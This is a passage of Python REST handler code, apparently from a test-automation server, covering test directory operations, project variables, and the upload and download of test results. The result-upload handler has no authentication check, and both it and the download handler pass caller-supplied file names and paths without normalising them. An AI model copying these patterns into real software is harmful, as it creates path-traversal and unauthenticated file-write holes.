raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify destination")
newFolderName = self.request.data.get(
"destination")["directory-name"]
if newFolderName is None:
raise EmptyValue("Please specify a destination folder name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoTests.instance().renameDir(mainPath=folderPath, oldPath=folderName,
newPath=newFolderName, project=projectId)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to rename directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path, "message": "directory successfully renamed",
"project-id": projectId, "directory-name": folderName,
"directory-path": folderPath, "new-directory-name": newFolderName}
class TestsDirectoryDuplicate(HandlerCORS):
"""
/rest/tests/directory/duplicate
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Duplicate directory in the test storage
description: ''
operationId: testsDirectoryDuplicate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, directory-name, directory-path ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ project-id, file-name ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
responses:
'200':
description: rename response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/directory/rename",
"message": "directory successfully renamed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
# get the user profile
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
# checking json request on post
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue("Please specify a project id")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newProjectId = self.request.data.get("destination")["project-id"]
if newProjectId is None:
raise EmptyValue("Please specify a project id")
newFolderName = self.request.data.get(
"destination")["directory-name"]
if newFolderName is None:
raise EmptyValue("Please specify a destination folder name")
newFolderPath = self.request.data.get(
"destination")["directory-path"]
if newFolderPath is None:
raise EmptyValue("Please specify a destination folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
_check_project_permissions(
user_login=user_profile['login'],
project_id=newProjectId)
# some security check to avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
newFolderPath = os.path.normpath("/" + newFolderPath)
# all ok, do the duplication
success = RepoTests.instance().duplicateDir(
mainPath=folderPath, oldPath=folderName,
newPath=newFolderName, project=projectId,
newProject=newProjectId,
newMainPath=newFolderPath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to duplicate directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to duplicate directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path, "message": "directory successfully duplicated",
"project-id": projectId}
class TestsDirectoryMove(HandlerCORS):
"""
/rest/tests/directory/move
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Move directory in the test storage
description: ''
operationId: testsDirectoryMove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ project-id, directory-name, directory-path ]
properties:
project-id:
type: integer
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ project-id, directory-path ]
properties:
project-id:
type: integer
directory-path:
type: string
responses:
'200':
description: move response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/directory/move",
"message": "directory successfully moved"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
# get the user profile
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
# checking json request on post
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
projectId = self.request.data.get("source")["project-id"]
if projectId is None:
raise EmptyValue("Please specify a project id")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newProjectId = self.request.data.get("destination")["project-id"]
if newProjectId is None:
raise EmptyValue("Please specify a project id")
newFolderPath = self.request.data.get(
"destination")["directory-path"]
if newFolderPath is None:
raise EmptyValue("Please specify a destination folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
_check_project_permissions(
user_login=user_profile['login'],
project_id=newProjectId)
# some security check to avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
newFolderPath = os.path.normpath("/" + newFolderPath)
if "%s/%s" % (folderPath, folderName) == newFolderPath:
raise HTTP_403("Destination same as origin")
# all ok, do the duplication
success = RepoTests.instance().moveDir(
mainPath=folderPath,
folderName=folderName,
newPath=newFolderPath,
project=projectId,
newProject=newProjectId
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to move directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to move directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path, "message": "directory successfully moved",
"project-id": projectId}
class TestsDirectoryRemove(HandlerCORS):
"""
/rest/tests/directory/remove
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: remove directory in the test storage
description: ''
operationId: testsDirectoryRemove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, directory-path ]
properties:
project-id:
type: integer
directory-path:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/directory/remove",
"message": "directory successfully removed"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
folderPath = self.request.data.get("directory-path")
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
success = RepoTests.instance().delDir(folderPath, projectId)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to remove directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to remove directory (missing)")
if success == Context.instance().CODE_FORBIDDEN:
raise HTTP_403("Cannot remove directory")
return {"cmd": self.request.path, "message": "directory successfully removed",
"project-id": projectId}
"""
Variables handlers
"""
class VariablesAdd(HandlerCORS):
"""
/rest/variables/add/
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Add test variable in project, variables can be accessible from test
description: ''
operationId: variablesAdd
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, variable-name,variable-value]
properties:
variable-name:
type: string
variable-value:
type: string
description: in json format
project-id:
type: integer
responses:
'200':
description: variable successfully added
schema :
properties:
cmd:
type: string
message:
type: string
variable-id:
type: string
examples:
application/json: |
{
"message": "variable successfully added",
"cmd": "/variables/add",
"variable-id": "95"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project | Variable already exists
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
variableName = self.request.data.get("variable-name")
if variableName is None:
raise EmptyValue("Please specify the name of the variable")
variableJson = self.request.data.get("variable-value")
if variableJson is None:
raise EmptyValue("Please specify the value of the variable")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# dumps the json
try:
variableValue = json.dumps(variableJson)
except Exception:
raise HTTP_400("Bad json provided in value")
success, details = VariablesManager.instance().addVariableInDB(projectId=projectId,
variableName=variableName,
variableValue=variableValue)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403(details)
return {"cmd": self.request.path,
"message": "variable successfully added", "variable-id": details}
class VariablesDuplicate(HandlerCORS):
"""
/rest/variables/duplicate
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Duplicate test variable in project
description: ''
operationId: variablesDuplicate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id, variable-id]
properties:
variable-id:
type: string
project-id:
type: integer
responses:
'200':
description: variable successfully duplicated
schema :
properties:
cmd:
type: string
message:
type: string
variable-id:
type: string
examples:
application/json: |
{
"message": "variable successfully duplicated",
"cmd": "/variables/duplicate",
"variable-id": "95"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'404':
description: Variable not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
variableId = self.request.data.get("variable-id")
if variableId is None:
raise EmptyValue("Please specify a variable id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success, details = VariablesManager.instance().duplicateVariableInDB(variableId=variableId,
projectId=projectId)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404(details)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
return {"cmd": self.request.path,
"message": "variable successfully duplicated", "variable-id": details}
class VariablesUpdate(HandlerCORS):
"""
/rest/variables/update
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Update test variable in project
description: ''
operationId: variablesUpdate
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id, variable-id]
properties:
variable-id:
type: string
variable-name:
type: string
variable-value:
type: string
description: with json format
project-id:
type: integer
responses:
'200':
description: variable successfully updated
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "variable successfully updated",
"cmd": "/variables/update"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'404':
description: Variable not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
variableId = self.request.data.get("variable-id")
if variableId is None:
raise HTTP_400("Please specify a variable id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
variableName = self.request.data.get("variable-name")
variableJson = self.request.data.get("variable-value")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# dumps the json
try:
variableValue = json.dumps(variableJson)
except Exception:
raise HTTP_400("Bad json provided in value")
success, details = VariablesManager.instance().updateVariableInDB(variableId=variableId,
variableName=variableName,
variableValue=variableValue,
projectId=projectId)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404(details)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
return {"cmd": self.request.path,
"message": "variable successfully updated"}
class VariablesRemove(HandlerCORS):
"""
/rest/variables/remove
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Remove test variable in project
description: ''
operationId: variablesRemove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id, variable-id]
properties:
variable-id:
type: string
project-id:
type: integer
responses:
'200':
description: variable successfully removed
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "variable successfully removed",
"cmd": "/variables/remove"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'404':
description: Variable not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
variableId = self.request.data.get("variable-id")
if variableId is None:
raise HTTP_400("Please specify a variable id")
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success, details = VariablesManager.instance().delVariableInDB(
variableId=variableId, projectId=projectId)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404(details)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
return {"cmd": self.request.path,
"message": "variable successfully removed"}
class VariablesListing(HandlerCORS):
"""
/rest/variables/listing
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Get a listing of all test variables according to the project id or name
description: ''
operationId: variablesListing
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id]
properties:
project-id:
type: integer
responses:
'200':
description: variables listing
schema :
properties:
cmd:
type: string
message:
type: string
variables:
type: array
description: variables list in json format
items:
type: object
required: [ project-id, id, name, value ]
properties:
project-id:
type: integer
id:
type: integer
name:
type: string
value:
type: string
examples:
application/json: |
{
"variables": [
{
"project_id": 1,
"id": 1,
"value": false,
"name": "DEBUG"
}
],
"cmd": "/variables/listing"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success, details = VariablesManager.instance().getVariablesFromDB(projectId=projectId)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
return {"cmd": self.request.path,
"message": "listing result", "variables": details}
class VariablesSearchByName(HandlerCORS):
"""
/rest/variables/search/by/name
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Search a variable according to the name or id
description: ''
operationId: variablesSearchByName
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id, variable-name]
properties:
project-id:
type: integer
variable-name:
type: string
responses:
'200':
description: search result
schema :
properties:
cmd:
type: string
message:
type: string
variable:
description: variable in json format in only one match
type: object
required: [ project-id, id, name, value ]
properties:
project-id:
type: integer
id:
type: integer
name:
type: string
value:
type: string
variables:
type: array
description: variables list in json format on several occurences
items:
type: object
required: [ project-id, id, name, value ]
properties:
project-id:
type: integer
id:
type: integer
name:
type: string
value:
type: string
examples:
application/json: |
{
"variable": {
"project_id": 1,
"id": 95,
"value": "1.0",
"name": "VAR_AUTO"
},
"cmd": "/variables/search/by/name"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'404':
description: Variable not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
variableName = self.request.data.get("variable-name")
if variableName is None:
raise EmptyValue("Please specify the name of the variable")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success, details = VariablesManager.instance().getVariableFromDB(projectId=projectId,
variableName=variableName)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
if len(details) == 0:
raise HTTP_404("Variable not found")
return {"cmd": self.request.path,
"message": "search result", "variables": details}
class VariablesSearchById(HandlerCORS):
"""
/rest/variables/search/by/id
"""
@_to_yaml
def post(self):
"""
tags:
- variables
summary: Search a variable according to the name or id
description: ''
operationId: variablesSearchById
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [project-id, variable-id]
properties:
project-id:
type: integer
variable-id:
type: string
responses:
'200':
description: search result
schema :
properties:
cmd:
type: string
message:
type: string
variable:
description: variable in json format in only one match
type: object
required: [ project-id, id, name, value ]
properties:
project-id:
type: integer
id:
type: integer
name:
type: string
value:
type: string
variables:
type: array
description: variables list in json format on several occurences
items:
type: object
required: [ project-id, id, name, value ]
properties:
project-id:
type: integer
id:
type: integer
name:
type: string
value:
type: string
examples:
application/json: |
{
"variable": {
"project_id": 1,
"id": 95,
"value": "1.0",
"name": "VAR_AUTO"
},
"cmd": "/variables/search/by/id"
}
'400':
description: Bad request provided | Bad project id provided | Bad json provided in value
'403':
description: Access denied to this project
'404':
description: Variable not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
variableId = self.request.data.get("variable-id")
if variableId is None:
raise EmptyValue("Please specify the id of the variable")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
success, details = VariablesManager.instance().getVariableFromDB(projectId=projectId,
variableId=variableId)
if success == Context.instance().CODE_ERROR:
raise HTTP_500(details)
if len(details) == 0:
raise HTTP_404("Variable not found")
return {"cmd": self.request.path,
"message": "search result", "variables": details}
"""
Tests Results handlers
"""
class ResultsUploadFile(HandlerCORS):
"""
/rest/results/upload/file
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Upload a file in the test result
description: ''
operationId: resultsUploadFile
consumes:
- application/json
produces:
- application/json
parameters:
- name: body
in: body
required: true
schema:
required: [ result-path, file-name, file-content ]
properties:
result-path:
type: string
file-name:
type: string
file-content:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/results/upload/file",
"message": "success"
}
'400':
description: Bad request provided
'403':
description: Extension file refused
'404':
description: Test result not found
'500':
description: Server error
"""
try:
resultPath = self.request.data.get("result-path")
if resultPath is None:
raise EmptyValue("Please specify a result path")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a file name")
fileContent = self.request.data.get("file-content")
if fileContent is None:
raise EmptyValue("Please specify a file content")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# we can upload only zip file
if not fileName.endswith(".zip") and not fileName.endswith(".png") \
and not fileName.endswith(".jpg") and not fileName.endswith(".mp4"):
raise HTTP_403('Extension file not authorized')
archiveRepo = '%s%s' % (Settings.getDirExec(),
Settings.get('Paths', 'testsresults'))
if not os.path.exists("%s/%s" % (archiveRepo, resultPath)):
raise HTTP_404('test result path not found')
success = RepoArchives.instance().createResultLog(testsPath=archiveRepo,
logPath=resultPath,
logName=fileName,
logData=fileContent)
if not success:
raise HTTP_500("Unable to upload file in testresult")
return {"cmd": self.request.path, 'message': 'success'}
class ResultsListingFiles(HandlerCORS):
"""
/rest/results/listing/files
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get the listing of all tests results
description: ''
operationId: resultsListingFiles
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
partial-list:
type: boolean
project-id:
type: integer
responses:
'200':
description: all test results with details
schema :
properties:
cmd:
type: string
listing:
type: list
description: listing all test results
items:
type: object
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/listing/files",
"listing": [...],
"nb-folders": 2,
"nb-files": 2,
"statistics": {...}
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_partial = self.request.data.get("partial-list", True)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
nb_archs, nb_archs_f, archs, stats_archs = RepoArchives.instance().getTree(fullTree=not _partial,
project=projectId)
return {"cmd": self.request.path,
"listing": archs,
"nb-folders": nb_archs,
"nb-files": nb_archs_f,
"statistics": stats_archs,
'project-id': projectId}
class ResultsListingBasic(HandlerCORS):
"""
/rest/results/listing/basic
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get the listing id of all tests results.
description: ''
operationId: resultsListingIdByDatetime
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
project-id:
type: integer
responses:
'200':
description: all tests results with id
schema :
properties:
cmd:
type: string
listing:
type: array
items:
type: object
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/listing/basic",
"listing": [...]
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
listing = RepoArchives.instance().getListingBasic(project_id=projectId)
return {"cmd": self.request.path,
"listing": listing,
'project-id': projectId}
class ResultsListingFilter(HandlerCORS):
"""
/rest/results/listing/by/id/datetime
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get the listing id of all tests results. Support date and time filtering.
description: ''
operationId: resultsListingIdByDatetime
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
project-id:
type: integer
date:
type: string
description: filter results by date "YYYY-MM-DD", returns only results greater than the date provided
time:
type: string
description: filter results by time "HH:MM:SS", returns only results greater than the time provided
responses:
'200':
description: all tests results with id
schema :
properties:
cmd:
type: string
listing:
type: array
items:
type: object
project-id:
type: string
examples:
application/json: |
{
"cmd": "/results/listing/by/id/datetime",
"listing": [...]
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
dateFilter = self.request.data.get("date", None)
timeFilter = self.request.data.get("time", None)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
listing = RepoArchives.instance().getListingFilter(projectId=projectId,
dateFilter=dateFilter,
timeFilter=timeFilter)
return {"cmd": self.request.path,
"listing": listing,
'project-id': projectId}
class ResultsDownloadResult(HandlerCORS):
"""
/rest/results/download/result
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get result file in test result
description: ''
operationId: resultsDownloadResult
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id, file-name ]
properties:
test-id:
type: string
project-id:
type: integer
file-name:
type: string
save-as:
type: boolean
description: parameter only used in windows client
save-as-name:
type: string
description: parameter only used in windows client
responses:
'200':
description: image
schema :
properties:
cmd:
type: string
result:
type: string
description: in base64
result-name:
type: string
project-id:
type: string
save-as:
type: boolean
save-as-name:
type: string
description: in base64
examples:
application/json: |
{
"cmd": "/results/download/result",
"result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"result-name": "....",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"save-as": False,
"save-as-dest: ""
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result by id not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
fileName = self.request.data.get("file-name")
if fileName is None:
raise EmptyValue("Please specify a file name")
testId = self.request.data.get("test-id")
if testId is None:
raise EmptyValue("Please specify a project id and test id")
_saveAs = self.request.data.get("save-as", False)
_saveAsDest = self.request.data.get("save-as-name", '')
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# extract the real test path according the test id
founded, testPath = RepoArchives.instance().findTrInCache(projectId=projectId,
testId=testId, returnProject=False)
if founded == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result by id not found')
trxPath = "%s/%s" % (testPath, fileName)
success, _, nameFile, extFile, _, b64result, _, _ = RepoArchives.instance().getFile(pathFile=trxPath,
project=projectId,
addLock=False)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("Result file not found")
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to get file, check log in server side")
return {"cmd": self.request.path, 'test-id': testId, 'project-id': projectId,
'result': b64result, 'result-name': nameFile, "result-extension": extFile,
'save-as': _saveAs, 'save-as-name': _saveAsDest}
class ResultsDownloadResultUncomplete(HandlerCORS):
"""
/rest/results/download/uncomplete
"""
@_to_yaml
def post(self):
"""
tags:
- results
summary: Get result events event if the test is not yet terminated
description: ''
operationId: resultsDownloadUncomplete
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-id, project-id ]
properties:
test-id:
type: string
project-id:
type: integer
responses:
'200':
description: image
schema :
properties:
cmd:
type: string
result:
type: string
description: in base64
result-name:
type: string
project-id:
type: string
save-as:
type: boolean
save-as-name:
type: string
description: in base64
examples:
application/json: |
{
"cmd": "/results/download/uncomplete",
"result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
"result-name": "....",
"test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
"save-as": False,
"save-as-dest: ""
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'404':
description: Test result by id not found
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testId = self.request.data.get("test-id")
if testId is None:
raise EmptyValue("Please specify a test id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# extract the real test path according the test id
success, testPath = RepoArchives.instance().findTrInCache(
projectId=projectId, testId=testId)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404('Test result by id not found')
success, trName = RepoArchives.instance().createTrTmp(trPath=testPath)
if success != Context.instance().CODE_OK:
raise HTTP_500('Unable to get partial test result')
